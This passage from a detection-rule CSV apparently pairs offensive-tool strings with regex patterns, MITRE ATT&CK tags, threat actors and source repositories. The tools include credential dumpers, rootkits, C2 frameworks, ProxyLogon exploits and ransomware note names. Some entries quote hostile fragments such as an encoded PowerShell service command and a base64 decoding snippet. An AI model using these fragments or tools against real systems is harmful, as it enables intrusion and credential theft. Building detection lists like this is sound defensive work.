Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","13514" "*[System.Windows.Forms.MessageBox]::Show(""Congratulations, it looks like, your download cradle is working*",".{0,1000}\[System\.Windows\.Forms\.MessageBox\]\:\:Show\(\""Congratulations,\sit\slooks\slike,\syour\sdownload\scradle\sis\sworking.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - 
T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","13515" "*[System[Provider[@Name='Microsoft-Windows-Windows Defender'] and (EventID=5007)]]*",".{0,1000}\[System\[Provider\[\@Name\=\'Microsoft\-Windows\-Windows\sDefender\'\]\sand\s\(EventID\=5007\)\]\].{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13516" "*[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bABzAGEAcwBzAA==*",".{0,1000}\[Text\.Encoding\]\:\:Unicode\.GetString\(\[Convert\]\:\:FromBase64String\(\'bABzAGEAcwBzAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","13517" "*[warn] You either fat fingered this or something else. 
Either way*",".{0,1000}\[warn\]\sYou\seither\sfat\sfingered\sthis\sor\ssomething\selse\.\sEither\sway.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","13518" "*[WARNING] continuing the attack anyway!*",".{0,1000}\[WARNING\]\scontinuing\sthe\sattack\sanyway!.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#content","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","13519" "*[WARNING] we didn't get * cookie, the attack will likely fail!*",".{0,1000}\[WARNING\]\swe\sdidn\'t\sget\s.{0,1000}\scookie,\sthe\sattack\swill\slikely\sfail!.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#content","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","13520" "*[winPEAS.Program]::Main(*",".{0,1000}\[winPEAS\.Program\]\:\:Main\(.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13521" "*[winPEAS.Program]::Main*",".{0,1000}\[winPEAS\.Program\]\:\:Main.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - 
T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13522" "*[x] Cannot load NTDLL.DLL*",".{0,1000}\[x\]\sCannot\sload\sNTDLL\.DLL.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","13523" "*[x] Failed to locate the ngentask.exe binary in the WinSxS directory*",".{0,1000}\[x\]\sFailed\sto\slocate\sthe\sngentask\.exe\sbinary\sin\sthe\sWinSxS\sdirectory.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","#content","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","13524" "*[X] Must be elevated to triage SYSTEM credentials!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\scredentials!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13525" "*[X] Must be elevated to triage SYSTEM masterkeys!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\smasterkeys!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13526" "*[X] Must be elevated to triage SYSTEM vaults!*",".{0,1000}\[X\]\sMust\sbe\selevated\sto\striage\sSYSTEM\svaults!.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#content","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","13527" "*[X] No users found to Kerberoast!*",".{0,1000}\[X\]\sNo\susers\sfound\sto\sKerberoast!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13528" "*[X] Not in high integrity, unable to MiniDump!*",".{0,1000}\[X\]\sNot\sin\shigh\sintegrity,\sunable\sto\sMiniDump!.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - 
TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#content","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","13529" "*[X] ShellCode Property Created*",".{0,1000}\[X\]\sShellCode\sProperty\sCreated.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#content","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","13530" "*[X] Uploading Shellcode into target*",".{0,1000}\[X\]\sUploading\sShellcode\sinto\starget.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#content","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","13531" "*[X] You need to be in high integrity to apply a ticket to a different logon session*",".{0,1000}\[X\]\sYou\sneed\sto\sbe\sin\shigh\sintegrity\sto\sapply\sa\sticket\sto\sa\sdifferent\slogon\ssession.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","13532" "*[X] Your harvest exploded:*",".{0,1000}\[X\]\sYour\sharvest\sexploded\:.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - 
T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","13533" "*\ rev_shell.py*",".{0,1000}\\\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13534" "*\!!!file was stolen!!!.txt*",".{0,1000}\\!!!file\swas\sstolen!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13535" "*\!!!READ_ME_MEDUSA!!!.txt*",".{0,1000}\\!!!READ_ME_MEDUSA!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13536" "*\!!!start leak file!!!.txt*",".{0,1000}\\!!!start\sleak\sfile!!!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13537" "*\!_^_README_NOTES_RAGNAR_^_!.txt*",".{0,1000}\\!_\^_README_NOTES_RAGNAR_\^_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13538" "*\!_karakurt_READ_ME_!.txt*",".{0,1000}\\!_karakurt_READ_ME_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13539" "*\!_WHATS_HAPPENED_!.txt*",".{0,1000}\\!_WHATS_HAPPENED_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13540" "*\!_WHY_FILES_ARE_ENCRYPTED_!.txt*",".{0,1000}\\!_WHY_FILES_ARE_ENCRYPTED_!\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13541" "*\""-SecureString\"" OR \""-AsPlainText\"" OR \""Net.NetworkCredential\""*",".{0,1000}\\\""\-SecureString\\\""\sOR\s\\\""\-AsPlainText\\\""\sOR\s\\\""Net\.NetworkCredential\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","13542" 
"*\#BlackHunt_ReadMe.html*",".{0,1000}\\\#BlackHunt_ReadMe\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13543" "*\$*.kirbi*",".{0,1000}\\\$.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13544" "*\(s)AINT\Cam*",".{0,1000}\\\(s\)AINT\\Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13545" "*\(s)AINT\Logs*",".{0,1000}\\\(s\)AINT\\Logs.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - 
T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13546" "*\(s)AINT\saint.jar*",".{0,1000}\\\(s\)AINT\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13547" "*\(s)AINT\Screenshot*",".{0,1000}\\\(s\)AINT\\Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13548" "*\*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13550" "*\*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13551" 
"*\*.O365.Roles_Admins.txt*",".{0,1000}\\.{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","N/A","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","13552" "*\*.smukx*",".{0,1000}\\.{0,1000}\.smukx.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13553" "*\*_AD-Audit_*.txt*",".{0,1000}\\.{0,1000}_AD\-Audit_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","13554" "*\.\pipe\$77childproc*",".{0,1000}\\\.\\pipe\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13556" "*\.\pipe\$77childproc64*",".{0,1000}\\\.\\pipe\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13557" "*\.\pipe\$77control_redirect*",".{0,1000}\\\.\\pipe\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13558" "*\.clone.dll*",".{0,1000}\\\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","13561" "*\.eKeys-Parsed.txt*",".{0,1000}\\\.eKeys\-Parsed\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13564" "*\.README_TO_RESTORE*",".{0,1000}\\\.README_TO_RESTORE.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13566" "*\:MLKH*",".{0,1000}\\\:MLKH.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13571" "*\\$ComputerName delete $ServiceName*",".{0,1000}\\\\\$ComputerName\sdelete\s\$ServiceName.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13572" "*\\* create Service_* binpath= `""C:\Windows\System32\cmd.exe /c powershell.exe -enc *",".{0,1000}\\\\.{0,1000}\screate\sService_.{0,1000}\sbinpath\=\s\`\""C\:\\Windows\\System32\\cmd\.exe\s\/c\spowershell\.exe\s\-enc\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","13573" "*\\*\pipe\psexecsvc*",".{0,1000}\\\\.{0,1000}\\pipe\\psexecsvc.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#namedpipe","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","13574" "*\\.\\pipe\\$77childproc*",".{0,1000}\\\\\.\\\\pipe\\\\\$77childproc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13575" "*\\.\\pipe\\$77control_redirect*",".{0,1000}\\\\\.\\\\pipe\\\\\$77control_redirect.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13576" "*\\.\\pipe\\blindspot-*",".{0,1000}\\\\\.\\\\pipe\\\\blindspot\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#namedpipe","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13577" "*\\.\\pipe\\kangaroo*",".{0,1000}\\\\\.\\\\pipe\\\\kangaroo.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#namedpipe","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13578" "*\\.\\pipe\\lsarelayx*",".{0,1000}\\\\\.\\\\pipe\\\\lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","#namedpipe","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","13579" 
"*\\.\\pipe\\Teste*",".{0,1000}\\\\\.\\\\pipe\\\\Teste.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","#namedpipe","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13581" "*\\.\mimidrv*",".{0,1000}\\\\\.\\mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","13582" "*\\.\Nidhogg*",".{0,1000}\\\\\.\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - 
